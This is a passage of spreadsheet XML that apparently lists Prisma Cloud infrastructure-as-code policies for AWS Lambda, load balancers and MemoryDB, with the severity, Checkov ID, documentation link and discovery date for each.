        <v>1</v>
      </c>
      <c r="AE790" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF790" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>c62e89dd-600d-48d3-afc0-0de3510534b3</t>
        </is>
      </c>
      <c r="AI790" t="inlineStr"/>
      <c r="AJ790" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK790" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" t="inlineStr"/>
      <c r="B791" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C791" s="2" t="inlineStr"/>
      <c r="D791" t="inlineStr"/>
      <c r="E791" t="inlineStr"/>
      <c r="F791" t="inlineStr"/>
      <c r="G791" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J791" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda</t>
        </is>
      </c>
      <c r="K791" t="inlineStr">
        <is>
          <t>Runtime of Lambda is deprecated</t>
        </is>
      </c>
      <c r="L791" t="inlineStr"/>
      <c r="M791" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N791" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O791" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P791" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q791" t="inlineStr"/>
      <c r="R791" t="inlineStr"/>
      <c r="S791" t="inlineStr"/>
      <c r="T791" t="b">
        <v>0</v>
      </c>
      <c r="U791" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V791" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda-function</t>
        </is>
      </c>
      <c r="W791" t="inlineStr">
        <is>
          <t>Ensure Lambda Runtime is not deprecated</t>
        </is>
      </c>
      <c r="X791" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-363</t>
        </is>
      </c>
      <c r="Y791" t="inlineStr"/>
      <c r="Z791" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA791" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB791" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC791" t="inlineStr">
        <is>
          <t>CKV_AWS_363</t>
        </is>
      </c>
      <c r="AD791" t="b">
        <v>1</v>
      </c>
      <c r="AE791" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF791" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>a428cdf6-2a48-4a84-99e9-8d61f58484b1</t>
        </is>
      </c>
      <c r="AI791" t="inlineStr"/>
      <c r="AJ791" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK791" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" t="inlineStr"/>
      <c r="B792" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C792" s="2" t="inlineStr"/>
      <c r="D792" t="inlineStr"/>
      <c r="E792" t="inlineStr"/>
      <c r="F792" t="inlineStr"/>
      <c r="G792" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J792" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda</t>
        </is>
      </c>
      <c r="K792" t="inlineStr">
        <is>
          <t>AWS Lambda function is not configured for function-level concurrent execution Limit</t>
        </is>
      </c>
      <c r="L792" t="inlineStr"/>
      <c r="M792" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N792" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O792" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P792" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q792" t="inlineStr"/>
      <c r="R792" t="inlineStr"/>
      <c r="S792" t="inlineStr"/>
      <c r="T792" t="b">
        <v>0</v>
      </c>
      <c r="U792" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V792" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda-function</t>
        </is>
      </c>
      <c r="W792" t="inlineStr">
        <is>
          <t>Ensure that AWS Lambda function is configured for function-level concurrent execution limit</t>
        </is>
      </c>
      <c r="X792" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-aws-lambda-function-is-configured-for-function-level-concurrent-execution-limit</t>
        </is>
      </c>
      <c r="Y792" t="inlineStr"/>
      <c r="Z792" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA792" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB792" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC792" t="inlineStr">
        <is>
          <t>CKV_AWS_115</t>
        </is>
      </c>
      <c r="AD792" t="b">
        <v>1</v>
      </c>
      <c r="AE792" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF792" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>d1ad0d2f-9553-4b1a-a76c-16d9b5c5b721</t>
        </is>
      </c>
      <c r="AI792" t="inlineStr"/>
      <c r="AJ792" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK792" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" t="inlineStr"/>
      <c r="B793" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C793" s="2" t="inlineStr"/>
      <c r="D793" t="inlineStr"/>
      <c r="E793" t="inlineStr"/>
      <c r="F793" t="inlineStr"/>
      <c r="G793" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J793" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda</t>
        </is>
      </c>
      <c r="K793" t="inlineStr">
        <is>
          <t>AWS Lambda function is not configured for a DLQ</t>
        </is>
      </c>
      <c r="L793" t="inlineStr"/>
      <c r="M793" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N793" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O793" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P793" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q793" t="inlineStr"/>
      <c r="R793" t="inlineStr"/>
      <c r="S793" t="inlineStr"/>
      <c r="T793" t="b">
        <v>0</v>
      </c>
      <c r="U793" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V793" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda-function</t>
        </is>
      </c>
      <c r="W793" t="inlineStr">
        <is>
          <t>Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)</t>
        </is>
      </c>
      <c r="X793" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-aws-lambda-function-is-configured-for-a-dead-letter-queue-dlq</t>
        </is>
      </c>
      <c r="Y793" t="inlineStr"/>
      <c r="Z793" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA793" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB793" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC793" t="inlineStr">
        <is>
          <t>CKV_AWS_116</t>
        </is>
      </c>
      <c r="AD793" t="b">
        <v>1</v>
      </c>
      <c r="AE793" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF793" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>24881533-c12a-4af7-9e41-c1d8c5117a10</t>
        </is>
      </c>
      <c r="AI793" t="inlineStr"/>
      <c r="AJ793" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK793" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 3)</t>
        </is>
      </c>
      <c r="B794" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C794" s="2" t="inlineStr"/>
      <c r="D794" t="inlineStr"/>
      <c r="E794" t="inlineStr"/>
      <c r="F794" t="inlineStr"/>
      <c r="G794" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J794" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda</t>
        </is>
      </c>
      <c r="K794" t="inlineStr">
        <is>
          <t>AWS Lambda Function is not assigned to access within VPC</t>
        </is>
      </c>
      <c r="L794" t="inlineStr"/>
      <c r="M794" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N794" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O794" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P794" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q794" t="inlineStr">
        <is>
          <t>8.1.3</t>
        </is>
      </c>
      <c r="R794" t="inlineStr">
        <is>
          <t>8.1.3.2</t>
        </is>
      </c>
      <c r="S794" t="inlineStr"/>
      <c r="T794" t="b">
        <v>0</v>
      </c>
      <c r="U794" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V794" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda-function</t>
        </is>
      </c>
      <c r="W794" t="inlineStr">
        <is>
          <t>Ensure that AWS Lambda function is configured inside a VPC</t>
        </is>
      </c>
      <c r="X794" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-aws-lambda-function-is-configured-inside-a-vpc-1</t>
        </is>
      </c>
      <c r="Y794" t="inlineStr"/>
      <c r="Z794" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA794" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB794" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC794" t="inlineStr">
        <is>
          <t>CKV_AWS_117</t>
        </is>
      </c>
      <c r="AD794" t="b">
        <v>1</v>
      </c>
      <c r="AE794" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF794" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>53e447a8-95dc-416b-8c11-c858c2828dd8</t>
        </is>
      </c>
      <c r="AI794" t="inlineStr"/>
      <c r="AJ794" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK794" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" t="inlineStr"/>
      <c r="B795" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C795" s="2" t="inlineStr"/>
      <c r="D795" t="inlineStr"/>
      <c r="E795" t="inlineStr"/>
      <c r="F795" t="inlineStr"/>
      <c r="G795" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J795" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda</t>
        </is>
      </c>
      <c r="K795" t="inlineStr">
        <is>
          <t>AWS Lambda function is not configured to validate code-signing</t>
        </is>
      </c>
      <c r="L795" t="inlineStr"/>
      <c r="M795" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N795" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O795" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P795" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q795" t="inlineStr"/>
      <c r="R795" t="inlineStr"/>
      <c r="S795" t="inlineStr"/>
      <c r="T795" t="b">
        <v>0</v>
      </c>
      <c r="U795" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V795" t="inlineStr">
        <is>
          <t>IaC:General:aws-lambda-function</t>
        </is>
      </c>
      <c r="W795" t="inlineStr">
        <is>
          <t>Ensure AWS Lambda function is configured to validate code-signing</t>
        </is>
      </c>
      <c r="X795" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-272</t>
        </is>
      </c>
      <c r="Y795" t="inlineStr"/>
      <c r="Z795" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA795" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB795" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC795" t="inlineStr">
        <is>
          <t>CKV_AWS_272</t>
        </is>
      </c>
      <c r="AD795" t="b">
        <v>1</v>
      </c>
      <c r="AE795" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF795" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>b4e32eaa-9cf9-4fa1-9d34-ecf08b711b19</t>
        </is>
      </c>
      <c r="AI795" t="inlineStr"/>
      <c r="AJ795" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK795" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" t="inlineStr"/>
      <c r="B796" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C796" s="2" t="inlineStr"/>
      <c r="D796" t="inlineStr"/>
      <c r="E796" t="inlineStr"/>
      <c r="F796" t="inlineStr"/>
      <c r="G796" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J796" t="inlineStr">
        <is>
          <t>IaC:General:aws-lb</t>
        </is>
      </c>
      <c r="K796" t="inlineStr">
        <is>
          <t>AWS Load Balancer is not using TLS 1.2</t>
        </is>
      </c>
      <c r="L796" t="inlineStr"/>
      <c r="M796" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N796" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O796" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P796" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q796" t="inlineStr"/>
      <c r="R796" t="inlineStr"/>
      <c r="S796" t="inlineStr"/>
      <c r="T796" t="b">
        <v>0</v>
      </c>
      <c r="U796" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V796" t="inlineStr">
        <is>
          <t>IaC:General:aws-lb-listener</t>
        </is>
      </c>
      <c r="W796" t="inlineStr">
        <is>
          <t>Ensure that load balancer is using TLS 1.2</t>
        </is>
      </c>
      <c r="X796" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-43</t>
        </is>
      </c>
      <c r="Y796" t="inlineStr"/>
      <c r="Z796" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lb_listener"]}</t>
        </is>
      </c>
      <c r="AA796" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB796" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC796" t="inlineStr">
        <is>
          <t>CKV_AWS_103</t>
        </is>
      </c>
      <c r="AD796" t="b">
        <v>1</v>
      </c>
      <c r="AE796" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF796" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>72141d35-c371-4aa6-ae6d-1a37dd26d59d</t>
        </is>
      </c>
      <c r="AI796" t="inlineStr"/>
      <c r="AJ796" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK796" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" t="inlineStr"/>
      <c r="B797" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C797" s="2" t="inlineStr"/>
      <c r="D797" t="inlineStr"/>
      <c r="E797" t="inlineStr"/>
      <c r="F797" t="inlineStr"/>
      <c r="G797" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J797" t="inlineStr">
        <is>
          <t>IaC:General:aws-lb</t>
        </is>
      </c>
      <c r="K797" t="inlineStr">
        <is>
          <t>AWS HTTP and HTTPS target groups do not define health check</t>
        </is>
      </c>
      <c r="L797" t="inlineStr"/>
      <c r="M797" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N797" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O797" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P797" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q797" t="inlineStr"/>
      <c r="R797" t="inlineStr"/>
      <c r="S797" t="inlineStr"/>
      <c r="T797" t="b">
        <v>0</v>
      </c>
      <c r="U797" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V797" t="inlineStr">
        <is>
          <t>IaC:General:aws-lb-target-group,aws-alb-target-group</t>
        </is>
      </c>
      <c r="W797" t="inlineStr">
        <is>
          <t>Ensure HTTP HTTPS Target group defines Healthcheck</t>
        </is>
      </c>
      <c r="X797" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y797" t="inlineStr"/>
      <c r="Z797" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_lb_target_group", "aws_alb_target_group"]}</t>
        </is>
      </c>
      <c r="AA797" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB797" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC797" t="inlineStr">
        <is>
          <t>CKV_AWS_261</t>
        </is>
      </c>
      <c r="AD797" t="b">
        <v>1</v>
      </c>
      <c r="AE797" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF797" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>d7268cc6-d844-4613-9006-894dd9f35496</t>
        </is>
      </c>
      <c r="AI797" t="inlineStr"/>
      <c r="AJ797" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK797" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" t="inlineStr"/>
      <c r="B798" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C798" s="2" t="inlineStr"/>
      <c r="D798" t="inlineStr"/>
      <c r="E798" t="inlineStr"/>
      <c r="F798" t="inlineStr"/>
      <c r="G798" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J798" t="inlineStr">
        <is>
          <t>IaC:General:aws-memorydb</t>
        </is>
      </c>
      <c r="K798" t="inlineStr">
        <is>
          <t>AWS MemoryDB data is not encrypted in transit</t>
        </is>
      </c>
      <c r="L798" t="inlineStr"/>
      <c r="M798" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N798" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O798" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P798" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q798" t="inlineStr"/>
      <c r="R798" t="inlineStr"/>
      <c r="S798" t="inlineStr"/>
      <c r="T798" t="b">
        <v>0</v>
      </c>
      <c r="U798" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V798" t="inlineStr">
        <is>
          <t>IaC:General:aws-memorydb-cluster</t>
        </is>
      </c>
      <c r="W798" t="inlineStr">
        <is>
          <t>Ensure MemoryDB data is encrypted in transit</t>
        </is>
      </c>
      <c r="X798" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-memorydb-data-is-encrypted-in-transit</t>
        </is>
      </c>
      <c r="Y798" t="inlineStr"/>
      <c r="Z798" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_memorydb_cluster"]}</t>
        </is>
      </c>
      <c r="AA798" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB798" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC798" t="inlineStr">
        <is>
          <t>CKV_AWS_202</t>
        </is>
      </c>
      <c r="AD798" t="b">
        <v>1</v>
      </c>
      <c r="AE798" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF798" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>6beedb16-4109-41d3-95c5-0a503faa27b7</t>
        </is>
      </c>
      <c r="AI798" t="inlineStr"/>
      <c r="AJ798" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK798" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" t="inlineStr"/>
      <c r="B799" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C799" s="2" t="inlineStr"/>
      <c r="D799" t="inlineStr"/>
      <c r="E799" t="inlineStr"/>
      <c r="F799" t="inlineStr"/>
      <c r="G799" t="b">
        <v>1</v>
      </c>
      <c r="H7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799" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J799" t="inlineStr">
        <is>
          <t>IaC:General:aws-memorydb</t>
        </is>
      </c>
      <c r="K799" t="inlineStr">
        <is>
          <t>AWS MemoryDB is not encrypted at rest by AWS' Key Management Service KMS using CMKs</t>
        </is>
      </c>
      <c r="L799" t="inlineStr"/>
      <c r="M799" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N799" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O799" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P799" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q799" t="inlineStr"/>
      <c r="R799" t="inlineStr"/>
      <c r="S799" t="inlineStr"/>
      <c r="T799" t="b">
        <v>0</v>
      </c>
      <c r="U799" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V799" t="inlineStr">
        <is>
          <t>IaC:General:aws-memorydb-cluster</t>
        </is>
      </c>
      <c r="W799" t="inlineStr">
        <is>
          <t>Ensure MemoryDB is encrypted at rest using KMS CMKs</t>
        </is>
      </c>
      <c r="X799" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-memorydb-is-encrypted-at-rest-by-aws-key-management-service-kms-using-cmks</t>
        </is>
      </c>
      <c r="Y799" t="inlineStr"/>
      <c r="Z799" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_memorydb_cluster"]}</t>
        </is>
      </c>
      <c r="AA799" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB799" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC799" t="inlineStr">
        <is>
          <t>CKV_AWS_201</t>
        </is>
      </c>
      <c r="AD799" t="b">
        <v>1</v>
      </c>
      <c r="AE799" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF799" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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799" t="inlineStr">
        <is>
          <t>b8605e4f-9325-4d96-a3c0-169b88934fa5</t>
        </is>
      </c>
      <c r="AI799" t="inlineStr"/>
      <c r="AJ799" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK799" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" t="inlineStr"/>
      <c r="B800" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C800" s="2" t="inlineStr"/>
      <c r="D800" t="inlineStr"/>
      <c r="E800" t="inlineStr"/>
      <c r="F800" t="inlineStr"/>
      <c r="G800" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J800" t="inlineStr">
        <is>
          <t>IaC:General:aws-memorydb</t>
        </is>
      </c>
      <c r="K800" t="inlineStr">
        <is>
          <t>MemoryDB snapshot is not encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="L800" t="inlineStr"/>
      <c r="M800" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N800" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O800" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P800" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q800" t="inlineStr"/>
      <c r="R800" t="inlineStr"/>
      <c r="S800" t="inlineStr"/>
      <c r="T800" t="b">
        <v>0</v>
      </c>
      <c r="U800" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V800" t="inlineStr">
        <is>
          <t>IaC:General:aws-memorydb-snapshot</t>
        </is>
      </c>
      <c r="W800" t="inlineStr">
        <is>
          <t>Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X800" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-278</t>
        </is>
      </c>
      <c r="Y800" t="inlineStr"/>
      <c r="Z800" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_memorydb_snapshot"]}</t>
        </is>
      </c>
      <c r="AA800" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB800" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC800" t="inlineStr">
        <is>
          <t>CKV_AWS_278</t>
        </is>
      </c>
      <c r="AD800" t="b">
        <v>1</v>
      </c>
      <c r="AE800" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF800" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>1ebbda07-b7a0-4130-a1ae-b38f764930d4</t>
        </is>
      </c>
      <c r="AI800" t="inlineStr"/>
      <c r="AJ800" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK800" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" t="inlineStr"/>
      <c r="B801" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C801" s="2" t="inlineStr"/>
